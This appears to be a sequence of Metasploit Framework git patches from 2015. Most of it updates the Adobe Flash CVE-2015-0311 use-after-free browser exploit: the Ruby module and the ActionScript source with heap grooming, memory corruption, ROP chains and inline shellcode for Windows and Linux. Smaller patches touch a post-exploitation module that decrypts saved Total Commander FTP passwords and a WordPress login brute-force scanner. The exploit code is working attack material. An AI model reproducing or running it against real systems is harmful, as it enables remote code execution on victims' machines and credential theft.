zY%bf@S)1nce0-OegO<?ODcW>j;VfkL3W<pIol?)_BQOB1%Gh=({C{oQGrz9ZQ$3ua
zp~N{laK>r&8WC3hUDb?T3~%vXjO>b$_S&aZQ^BSM2c2!X-!oy`DUs+QhLB_FDuV2h
zE0p_4n<+f0p!*Zp#kkx>Qcd7F!Zz@SDpadYsXg1doQS~RP=+!Tq4><lV-x3jV%B)%
zHr9DN9Po8=xl~9ugMSHy;MgHxsQuTlb_&B)hF(@Y6>;k4ionw&2{@H1=|t~$%*Nn>
z<Ry(_u%=zq4+P|8@@8LBkOW8l+=Y+PeVsz$juVy9Q;^A6Alu;^j%$;eFs7gUs5V`P
zLq<BpH(3MW@%E)-cVex>n<xy5Lxz@W&H?UvuVa=~PwO?RbAMf4XrY8T<l(SAbvmw9
z6ZV<SfI%KcYRA|#mS{xgzr$G?b<+lR9AK!gab?_7$}v~sXHQAl9o5^b(e^Je!9vNm
zXrT{Tgve1`lR$eMr<2^n+?i~J&g(P;$mTMWD!h<g99<5xLsl&=*G4GP(;H$0TNx{3
zAfmwpv2koha(`sI#iM|R-zs0lf&U=Hg-}3`1%qfMXgD7#1Ov<G6!=7cij1waMSxJu
zRRY!RFMyM{!GWk+vLwRNZ>Y={)fxfsT0_u8rycad9W8w|rtEw&+62|ANGmP5$$m19
zyjQFCXtVd8QmNe|1auwdUvWCb%O<OwaDIO(AKnTGr++7B#5%^4uyh3NIUkI1socAX
zr9N}kSRSN@TDEobJB^L%PKcQaS+&kQIAnKC3^xELJKtTCaG=l&=h+sci|R2(vhFj1
z%?`f8w<62$YsI;GYbk?)TSJOp&A4Xou2h3<90W+h;_~YpF&H6Y+Q2P@$gWR)^Hez>
z?j#q@NPoEbpA($ma351LzNvqElVaGui5aI}V64RA+Q78D{AhwuAbVWgCJ0~E`{m;w
zOtxGw7G}}rwa)wfMPy2LVopKtUshDrkzrD*rRLpBAhetaOOPlgTsgu5w|u&@8B;(8
zwZoG;0|87$(go4O#AV$(XNmQBD(@$SNW;wg4=SyWlavC9ops*Z6)t<R5EL~iV7Q(0
X&DM+8ET5peYej$=T9-Bd>}mMgc-(Xv

diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index c862ba03d2..2b401c731b 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -40,20 +39,21 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'DisableNops' => true
         },
-      'Platform'            => ['win', 'unix'],
-      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
               os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+                os =~ OperatingSystems::Match::WINDOWS_7 ||
+                os =~ OperatingSystems::Match::WINDOWS_81
             end,
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE
+              return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end
@@ -75,14 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Windows',
             {
-              'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'Platform' => 'win'
             }
           ],
           [ 'Linux',
             {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Platform' => 'linux'
             }
           ]
         ],
@@ -112,15 +110,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
-      target_payload = get_payload(cli, target_info)
-      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-      b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
-      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
-      b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end
 
@@ -129,9 +125,9 @@ class Metasploit3 < Msf::Exploit::Remote
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From 75454f05c4927cefce6fb21035fe1f86bb4db009 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 4 Jun 2015 12:12:49 -0500
Subject: [PATCH 0311/1013] Update AS source code

---
 .../source/exploits/CVE-2015-0311/Exploit.as  |  36 +---
 .../CVE-2015-0311/ExploitByteArray.as         |   9 +-
 .../exploits/CVE-2015-0311/Exploiter.as       | 188 ++++++++++++++++--
 external/source/exploits/CVE-2015-0311/PE.as  |  15 +-
 4 files changed, 196 insertions(+), 52 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0311/Exploit.as b/external/source/exploits/CVE-2015-0311/Exploit.as
index 0e63483803..89a62606e8 100644
--- a/external/source/exploits/CVE-2015-0311/Exploit.as
+++ b/external/source/exploits/CVE-2015-0311/Exploit.as
@@ -24,22 +24,22 @@ package
         private var ba:ByteArray = new ByteArray()
         private var exploiter:Exploiter
         private var b64:Base64Decoder = new Base64Decoder()
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
-        private var massage:Vector.<Object> = new Vector.<Object>(10000)
+        private var os:String
 
         public function Exploit() 
         {
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
-            b64.decode(b64_payload)            
-            payload = b64.toByteArray().toString()
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
 
-            for (var i:uint = 0; i < massage.length / 2; i++) {
-                massage[i] = new Vector.<uint>(0x3e0) 
-            }
+            // defrag           
+            for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
 
             for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
             ba.compress()
@@ -49,10 +49,8 @@ package
             try {
                 ba.uncompress()
             } catch (e:Error) { }
-
-            for (i = massage.length / 2; i < massage.length; i++) {
-                massage[i] = new Vector.<uint>(0x3e0) 
-            }
+            uv = new Vector.<uint>(0x3e0)
+            uv[0] = 0 
 
             var test:uint = li32(0)
             if (test == 0x3e0) {
@@ -61,22 +59,8 @@ package
                 Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
                 return // something failed
             }
-
             
-            for (i = 0; i < massage.length; i++) {
-                if (massage[i].length == 0x3e0) {
-                    massage[i] = null
-                } else {
-                    Logger.log('[*] Exploit - corrupted vector found at ' + i)
-                    uv = massage[i]
-                    uv[0] = 0 
-                }
-            }
-
-            if (uv.length != 0xffffffff)
-                return
-            
-            exploiter = new Exploiter(this, platform, payload, uv)
+            exploiter = new Exploiter(this, platform, os, payload, uv)
         }
 
     }
diff --git a/external/source/exploits/CVE-2015-0311/ExploitByteArray.as b/external/source/exploits/CVE-2015-0311/ExploitByteArray.as
index 0da3b307b4..a8da46df7b 100644
--- a/external/source/exploits/CVE-2015-0311/ExploitByteArray.as
+++ b/external/source/exploits/CVE-2015-0311/ExploitByteArray.as
@@ -31,7 +31,6 @@ package
 
         public function lets_ready():void
         {
-            Logger.log("[*] ExploitByteArray - lets_ready()")
             ba.endian = "littleEndian"
             if (platform == "linux") {
                 ba.length = 0xffffffff
@@ -40,7 +39,6 @@ package
 
         public function is_ready():Boolean
         {
-            Logger.log("[*] ExploitByteArray - is_ready() - 0x" + ba.length.toString(16))
             if (ba.length == 0xffffffff)
                 return true
 
@@ -72,10 +70,15 @@ package
 
         public function write(addr:uint, value:* = 0, zero:Boolean = true):void
         {
+            var i:uint
+
             if (addr) ba.position = addr
             if (value is String) {
-                for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
                 if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
             } else ba.writeUnsignedInt(value)
         }
     }
diff --git a/external/source/exploits/CVE-2015-0311/Exploiter.as b/external/source/exploits/CVE-2015-0311/Exploiter.as
index 99b41d1f8a..9975dc8b6e 100644
--- a/external/source/exploits/CVE-2015-0311/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0311/Exploiter.as
@@ -9,8 +9,9 @@ package
         private var exploit:Exploit
         private var ev:ExploitVector
         private var eba:ExploitByteArray
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
+        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
@@ -23,13 +24,14 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(80000)
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
 
-        public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
             exploit = exp
             payload = p
             platform = pl
+            op_system = os
 
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
@@ -133,12 +135,19 @@ package
         private function do_rop():void
         {
             Logger.log("[*] Exploiter - do_rop()")
-            if (platform == "linux")
+            if (platform == "linux") {
                 do_rop_linux()
-            else if (platform == "win")
-                do_rop_windows()
-            else
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
                 return
+            }
         }
 
         private function do_rop_windows():void
@@ -147,11 +156,15 @@ package
             var pe:PE = new PE(eba)
             var flash:uint = pe.base(vtable)
             var winmm:uint = pe.module("winmm.dll", flash)
-            var kernel32:uint = pe.module("kernel32.dll", winmm)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
             var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-            var winexec:uint = pe.procedure("WinExec", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
             var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
             var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
@@ -169,16 +182,101 @@ package
             eba.write(0, virtualprotect)
 
             // VirtualProtect
-            eba.write(0, winexec)
+            eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
             eba.write(0, 0x40)
             eba.write(0, buffer + 0x8) // Writable address (4 bytes)
 
-            // WinExec
-            eba.write(0, buffer + 0x10)
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
-            eba.write(0)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
 
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
             exploit.toString() // call method in the fake vtable
@@ -192,6 +290,8 @@ package
             var libc:Elf = new Elf(eba, feof)
             var popen:uint = libc.symbol("popen")
             var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
             var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
             var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
             var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
@@ -204,9 +304,21 @@ package
             // 2) Recover original stack
             eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
 
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
             // Put the popen parameters in memory
-            eba.write(payload_address + 8, 'r', true) // type
-            eba.write(payload_address + 0xc, payload, true) // command
+            eba.write(payload_address + 0x8, payload, true) // false
            
             // Put the fake stack/vtable on memory 
             eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
@@ -221,13 +333,49 @@ package
             eba.write(0, buffer) // addr
             eba.write(0, 0x1000) // size
             eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
-            // Return to popen()
-            eba.write(stack_address + 0x18068, popen)
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
             // Return to CoE (fix stack and object vtable)
             eba.write(0, buffer + 0x10)
-            // popen() argument
-            eba.write(0, payload_address + 0xc)
-            eba.write(0, payload_address + 8) 
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
            
             //call   DWORD PTR [eax+0x24]
             //EAX: 0x41414141 ('AAAA')
diff --git a/external/source/exploits/CVE-2015-0311/PE.as b/external/source/exploits/CVE-2015-0311/PE.as
index a80ade9321..8753586477 100644
--- a/external/source/exploits/CVE-2015-0311/PE.as
+++ b/external/source/exploits/CVE-2015-0311/PE.as
@@ -11,7 +11,6 @@ package
 
         public function base(addr:uint):uint
         {
-            Logger.log("[*] PE - base(): searching base for 0x" + addr.toString(16))
             addr &= 0xffff0000
             while (true) {
                 if (eba.read(addr) == 0x00905a4d) return addr
@@ -54,10 +53,20 @@ package
         public function gadget(gadget:String, hint:uint, addr:uint):uint
         {
             var find:uint = 0
+            var contents:uint = 0
             var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
             var value:uint = parseInt(gadget, 16)
-            for (var i:uint = 0; i < limit - 4; i++) if (value == (eba.read(addr + i) & hint)) break
-            return addr + i
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
         }
     }
 }

From d4f418fe3f3741611a602aedd96c55e40da84c96 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Thu, 4 Jun 2015 15:52:07 -0500
Subject: [PATCH 0312/1013] Style corrections

See #5480
---
 .../gather/credentials/total_commander.rb     | 38 +++++++++----------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb
index 2b807176cc..1f51aabd04 100644
--- a/modules/post/windows/gather/credentials/total_commander.rb
+++ b/modules/post/windows/gather/credentials/total_commander.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    print_status("Checking Default Locations...")
+    print_status('Checking Default Locations...')
     check_systemroot
 
     grab_user_profiles().each do |user|
@@ -45,25 +45,25 @@ class Metasploit3 < Msf::Post
     hklmpath = registry_getvaldata(commander_key, 'FtpIniName')
     case hklmpath
     when nil
-      print_status("Total Commander Does not Appear to be Installed Globally")
-    when "wcx_ftp.ini"
+      print_status('Total Commander Does not Appear to be Installed Globally')
+    when 'wcx_ftp.ini'
       print_status("Already Checked SYSTEMROOT")
-    when ".\\wcx_ftp.ini"
+    when '.\\wcx_ftp.ini'
       hklminstpath = registry_getvaldata(commander_key, 'InstallDir') || ''
       if hklminstpath.empty?
-        print_error("Unable to find InstallDir in registry, skipping wcx_ftp.ini")
+        print_error('Unable to find InstallDir in registry, skipping wcx_ftp.ini')
       else
         check_other(hklminstpath +'\\wcx_ftp.ini')
       end
     when /APPDATA/
-      print_status("Already Checked AppData")
+      print_status('Already Checked AppData')
     when /USERPROFILE/
-      print_status("Already Checked USERPROFILE")
+      print_status('Already Checked USERPROFILE')
     else
       check_other(hklmpath)
     end
 
-    userhives=load_missing_hives()
+    userhives = load_missing_hives()
     userhives.each do |hive|
       next if hive['HKU'] == nil
       print_status("Looking at Key #{hive['HKU']}")
@@ -72,21 +72,21 @@ class Metasploit3 < Msf::Post
       print_status("HKUP: #{hkupath}")
       case hkupath
       when nil
-        print_status("Total Commander Does not Appear to be Installed on This User")
-      when "wcx_ftp.ini"
+        print_status('Total Commander Does not Appear to be Installed on This User')
+      when 'wcx_ftp.ini'
         print_status("Already Checked SYSTEMROOT")
-      when ".\\wcx_ftp.ini"
+      when '.\\wcx_ftp.ini'
         hklminstpath = registry_getvaldata(profile_commander_key, 'InstallDir') || ''
         if hklminstpath.empty?
-          print_error("Unable to find InstallDir in registry, skipping wcx_ftp.ini")
+          print_error('Unable to find InstallDir in registry, skipping wcx_ftp.ini')
         else
           check_other(hklminstpath +'\\wcx_ftp.ini')
         end
       when /APPDATA/
-        print_status("Already Checked AppData")
+        print_status('Already Checked AppData')
 
       when /USERPROFILE/
-        print_status("Already Checked USERPROFILE")
+        print_status('Already Checked USERPROFILE')
       else
         check_other(hkupath)
       end
@@ -153,16 +153,16 @@ class Metasploit3 < Msf::Post
     ini=Rex::Parser::Ini.from_s(parse)
 
     ini.each_key do |group|
-      next if group=="General" or group == "default" or group=="connections"
+      next if group == 'General' or group == 'default' or group == 'connections'
       print_status("Processing Saved Session #{group}")
       host = ini[group]['host']
 
       username = ini[group]['username']
       passwd = ini[group]['password']
-      next if passwd==nil
+      next if passwd == nil
       passwd = decrypt(passwd)
       (host,port) = host.split(':')
-      port=21 if port==nil
+      port = 21 if port == nil
       print_good("*** Host: #{host} Port: #{port} User: #{username}  Password: #{passwd} ***")
       if session.db_record
         source_id = session.db_record.id
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Post
       b=seed(len)
       t=pwd3[a]
       pwd3[a] = pwd3[b]
-      pwd3[b]=t
+      pwd3[b] = t
     end
 
 
@@ -231,7 +231,7 @@ class Metasploit3 < Msf::Post
     end
 
 
-    fpwd=""
+    fpwd = ""
     pwd3[0,len].map{|a| fpwd << a.chr}
     return fpwd
 

From 06cc7590805c532e71e84f015c680a3bae40b210 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 4 Jun 2015 16:06:07 -0500
Subject: [PATCH 0313/1013] Use the correct help output for the ps command

It should not look like this:

```
meterpreter > ps -h
Usage: ps [ options ]

OPTIONS:
 -S       Search string to filter by
 -h 		This help menu
```

It should not not look like this:

```
meterpreter > ps -h
Use the command with no arguments to see all running processes.
The following options can be used to filter those results:

OPTIONS:

    -A <opt>  Filters processes on architecture (x86 or x86_64)
    -S <opt>  String to search for (converts to regex)
    -U <opt>  Filters processes on the user using the supplied RegEx
    -h        Help menu.
    -s        Show only SYSTEM processes
```
---
 .../ui/console/command_dispatcher/stdapi/sys.rb        | 10 +---------
 1 file changed, 1 insertion(+), 9 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 534c1f4172..8bcceb983c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -436,12 +436,7 @@ class Console::CommandDispatcher::Stdapi::Sys
             return true
           end
         when '-h'
-          print_line "Usage: ps [ options ]"
-          print_line
-          print_line "OPTIONS:"
-          print_line " -S       Search string to filter by"
-          print_line " -h 		This help menu"
-          print_line
+          cmd_ps_help
           return 0
       when "-A"
         print_line "Filtering on arch..."
@@ -491,7 +486,6 @@ class Console::CommandDispatcher::Stdapi::Sys
       'SearchTerm' => search_term)
 
     processes.each { |ent|
-
       session = ent['session'] == 0xFFFFFFFF ? '' : ent['session'].to_s
       arch    = ent['arch']
 
@@ -503,8 +497,6 @@ class Console::CommandDispatcher::Stdapi::Sys
       row = [ ent['pid'].to_s, ent['name'], arch, session, ent['user'], ent['path'] ]
 
       tbl << row #if (search_term.nil? or row.join(' ').to_s.match(search_term))
-
-
     }
 
     if (processes.length == 0)

From 346ea40d66674cc85485fe4c2ee2d8a00d71f094 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 4 Jun 2015 16:14:31 -0500
Subject: [PATCH 0314/1013] fix some alignment, add usage

---
 .../console/command_dispatcher/stdapi/sys.rb  | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 8bcceb983c..1108262a5e 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -429,15 +429,15 @@ class Console::CommandDispatcher::Stdapi::Sys
     # Parse opts
     @@ps_opts.parse(args) { |opt, idx, val|
       case opt
-        when '-S'
-          search_term = val
-          if search_term.nil?
-            print_error("Enter a search term")
-            return true
-          end
-        when '-h'
-          cmd_ps_help
-          return 0
+      when '-S'
+        search_term = val
+        if search_term.nil?
+          print_error("Enter a search term")
+          return true
+        end
+      when '-h'
+        cmd_ps_help
+        return true
       when "-A"
         print_line "Filtering on arch..."
         searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
@@ -510,6 +510,8 @@ class Console::CommandDispatcher::Stdapi::Sys
   end
 
   def cmd_ps_help
+    print_line "Usage: ps [ options ]"
+    print_line
     print_line "Use the command with no arguments to see all running processes."
     print_line "The following options can be used to filter those results:"
 

From 874e090aa1de45bdf567d4a72f2e8f0a32dd1d64 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 4 Jun 2015 18:16:14 -0500
Subject: [PATCH 0315/1013] Update wordpress_login_enum to use the new cred API

---
 .../scanner/http/wordpress_login_enum.rb      | 58 ++++++++++++++-----
 1 file changed, 44 insertions(+), 14 deletions(-)

diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
index 91111b50d1..86935219e2 100644
--- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb
+++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -100,18 +100,49 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: ssl ? 'https' : 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user]
+    }.merge(service_data)
+
+    if opts[:password]
+      credential_data.merge!(
+        private_data: opts[:password],
+        private_type: :password
+      )
+    end
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
